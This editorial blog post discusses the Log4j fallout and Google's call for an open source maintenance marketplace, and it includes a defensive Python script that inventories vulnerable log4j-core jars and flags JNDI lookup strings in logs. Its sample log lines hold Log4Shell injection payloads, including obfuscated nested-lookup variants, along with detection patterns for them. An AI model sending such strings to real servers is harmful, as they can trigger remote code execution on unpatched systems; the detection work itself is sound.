Government calls for action on open source; Google volunteers to support a marketplace approach to open source
Open source and security
In the aftermath of the Log4j vulnerability, which was exploited on a scale rarely seen before, the White House called a meeting of minds from giant corporations including Google, HP, IBM and others. The Log4j vulnerability affected a large part of the technology community, including many corporations, and let attackers execute code remotely on corporate servers. A flaw in how Log4j, an open source Apache logging library, handled JNDI lookups was an eye opener for the world. The event provoked the technology community to take several actions on its open source implementations, including re-validation of where and how such components are used. There is no way around it: open source is the way to breakthrough innovation, but given the magnitude of the attacks now happening, one should conduct methodical testing before any kind of deployment.
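The "re-validation" described above comes down to two practical checks: which versions of log4j-core are actually deployed, and whether JNDI lookup strings are arriving in logged input. The following script is an added example, not RiverLog's code or anything from the Apache project; the jar paths and log lines are constructed for illustration, and the version policy (flag the 2.x line below 2.17.1, with the 2.3.2 and 2.12.4 backports as exceptions, and anything outside 2.x as end-of-life) is this example's assumption rather than an official rule.

```python
"""Re-validation checks for a Log4j deployment (added example, constructed data):
inventory log4j-core jar versions and scan log lines for JNDI lookup strings."""
import os
import re
from typing import Iterable, List, Tuple

# Log4j 2 releases up to 2.14.1 let a logged string such as "${jndi:ldap://host/x}"
# trigger a remote JNDI lookup (CVE-2021-44228). Policy assumed for this example:
# anything in the 2.x line below 2.17.1 is flagged for review (2.17.1 also closed
# CVE-2021-44832); the Java 6/7 backport lines 2.3.x and 2.12.x are fixed at
# 2.3.2 and 2.12.4; 1.x is end-of-life and always flagged.
FIXED_MAIN = (2, 17, 1)
FIXED_BACKPORTS = {(2, 3): (2, 3, 2), (2, 12): (2, 12, 4)}

JAR_RE = re.compile(r"log4j-core-(\d+(?:\.\d+)*(?:-[A-Za-z0-9]+)?)\.jar$")


def parse_version(v: str) -> Tuple[Tuple[int, ...], bool]:
    """'2.15.0-rc2' -> ((2, 15, 0), True); the bool marks a pre-release suffix."""
    core, _, suffix = v.partition("-")
    nums = tuple(int(p) for p in core.split("."))
    return nums, bool(suffix)


def needs_review(v: str) -> bool:
    """True when a log4j-core version string falls under the review policy above."""
    nums, prerelease = parse_version(v)
    if nums[0] != 2:
        return True                       # 1.x (or anything else) is end-of-life
    nums3 = (nums + (0, 0, 0))[:3]        # pad '2.0' to (2, 0, 0)
    fixed = FIXED_BACKPORTS.get(nums3[:2], FIXED_MAIN)
    if nums3 < fixed:
        return True
    return prerelease and nums3 == fixed  # e.g. 2.17.1-rc1 is not the release


def walk_jars(root: str) -> List[str]:
    """Collect jar paths under a directory tree, to be fed to inventory_jars."""
    return [os.path.join(d, f) for d, _, files in os.walk(root)
            for f in files if f.endswith(".jar")]


def inventory_jars(paths: Iterable[str]) -> List[Tuple[str, str, bool]]:
    """(path, version, needs_review) for every log4j-core jar among the paths."""
    out = []
    for p in paths:
        m = JAR_RE.search(p)
        if m:
            out.append((p, m.group(1), needs_review(m.group(1))))
    return out


# Nested lookups are used to evade naive "${jndi:" matching, e.g. "${${lower:j}ndi:"
# or "${${::-j}ndi:". Unwrapping the two simplest forms (case lookups and the
# empty-name default "${:-x}") is a heuristic, not Log4j's full StrSubstitutor,
# so treat a hit as "needs a look", not as proof of exploitation.
UNWRAP = [
    re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I),
    re.compile(r"\$\{[^${}]*:-([^${}]*)\}"),
]
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalise(s: str) -> str:
    """Repeatedly strip the inner lookups until the string stops changing."""
    prev = None
    while prev != s:
        prev = s
        for rx in UNWRAP:
            s = rx.sub(r"\1", s)
    return s


def find_jndi_lookups(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (line number, line) for every line carrying a JNDI lookup string."""
    return [(n, line.rstrip("\n")) for n, line in enumerate(lines, 1)
            if JNDI_RE.search(normalise(line))]


# Constructed sample data: not a real deployment and not captured traffic.
SAMPLE_JARS = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/app/lib/log4j-core-2.17.1.jar",
    "/opt/legacy/lib/log4j-core-2.12.4.jar",
    "/opt/legacy/lib/log4j-core-2.0-beta9.jar",
    "/opt/app/lib/log4j-api-2.14.1.jar",       # api jar is not the vulnerable artifact
]
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 ua="Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 ua="${jndi:ldap://lookup.example/a}"',
    '10.0.0.9 - - "GET /x HTTP/1.1" 404 ua="${${lower:j}ndi:ldap://lookup.example/b}"',
    '10.0.0.9 - - "GET /y HTTP/1.1" 404 ua="${${::-j}${::-n}di:rmi://lookup.example/c}"',
    '10.0.0.7 - - "GET /z HTTP/1.1" 200 ua="${date:yyyy}"',   # a lookup, but not JNDI
]

if __name__ == "__main__":
    for path, ver, flag in inventory_jars(SAMPLE_JARS):
        print(("REVIEW " if flag else "ok     ") + f"{ver:12} {path}")
    for n, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"JNDI lookup string on line {n}: {line}")
```

On a real host, replace `SAMPLE_JARS` with `walk_jars("/opt")` and stream the access log into `find_jndi_lookups`. The jar inventory misses log4j-core bundled inside fat jars or war files, so it is a first pass, not a substitute for a software bill of materials; and because the unwrapping is deliberately limited, a clean scan is not evidence that no lookup strings arrived.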
Google has said that more funding needs to be made available to open source initiatives, that a marketplace for open source maintenance is being called for, and that Google supports this initiative. Where in-house testing is done by one part of the enterprise, with a few engineers testing the system, open source is tested in real time by hundreds or even thousands of people in the course of their own deployments. A bug report goes to the community, someone picks it up and resolves it, the fix is retested, and a new release goes out to the public. This cycle works much better than a small group testing internally. Google is asking for continuous testing; it is not clear to us what that means in practice. What does need to happen is more intensive security-level testing. Let there be cybersecurity testers among the contributors, and let open source security experts get deeply involved. In short, let all of it, direction, specifications and secure hosting included, be done by the open source community. A marketplace may not be the right approach: it would create a fight for financial gain that could destroy the open source commons on which the entire innovation chain depends, and bring it down with it.
Do you think differently or have an opinion? Write your comments.
RiverLog Software Editorial